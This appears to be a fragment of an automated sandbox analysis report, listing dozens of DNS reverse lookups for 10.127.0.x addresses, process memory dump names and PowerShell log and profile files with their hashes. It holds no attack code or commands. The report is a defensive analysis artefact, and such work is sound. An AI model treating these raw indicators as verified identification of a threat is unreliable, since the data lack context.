US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp

Files

memory/680-137-0x0000020733960000-0x0000020733982000-memory.dmp

memory/680-141-0x000002071A0D3000-0x000002071A0D5000-memory.dmp

memory/680-140-0x000002071A0D0000-0x000002071A0D2000-memory.dmp

memory/680-142-0x000002071A0D6000-0x000002071A0D8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 787e5dc91589decdad77300ce525957c
SHA1 ecf70bb9a422bac2c4e67a674307120c6ef91185
SHA256 ab604fe5a8c12234ce6b85860c5744af8b0df4c69b2d9df755c92e32c9d4f3ed
SHA512 5d57c6572f35c172bdcb6eb1451a0cc15d9746ce96c65c54ef057df093b971d3be566badba46c2c65f4e7624203dccbc51d5b29fa2d5cb684faa88868db3ae75